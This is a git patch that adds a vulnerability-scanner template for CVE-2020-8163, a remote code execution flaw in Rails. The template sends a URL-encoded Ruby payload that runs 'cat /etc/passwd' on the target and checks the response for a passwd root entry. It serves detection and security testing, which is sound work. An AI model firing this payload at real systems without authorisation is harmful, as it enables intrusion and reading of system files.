From 03c0feee7747204c8691f3aa4ecce6d40b708f12 Mon Sep 17 00:00:00 2001 From: Tim Koopmans Date: Sun, 23 Aug 2020 07:47:58 +1000 Subject: [PATCH] Create CVE-2020-8163.yaml details of CVE at https://correkt.horse/ruby/2020/08/22/CVE-2020-8163/ --- cves/CVE-2020-8163.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 cves/CVE-2020-8163.yaml diff --git a/cves/CVE-2020-8163.yaml b/cves/CVE-2020-8163.yaml new file mode 100644 index 0000000000..4d8d1df15d --- /dev/null +++ b/cves/CVE-2020-8163.yaml @@ -0,0 +1,22 @@ +id: CVE-2020-8163 + +info: + name: Potential Remote Code Execution on Rails + author: tim_koopmans + severity: high + description: Tests for ability to pass user parameters as local variables into partials + # reference: https://correkt.horse/ruby/2020/08/22/CVE-2020-8163/ + +requests: + - method: GET + path: + - "{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:[x*]:0:0:" + part: body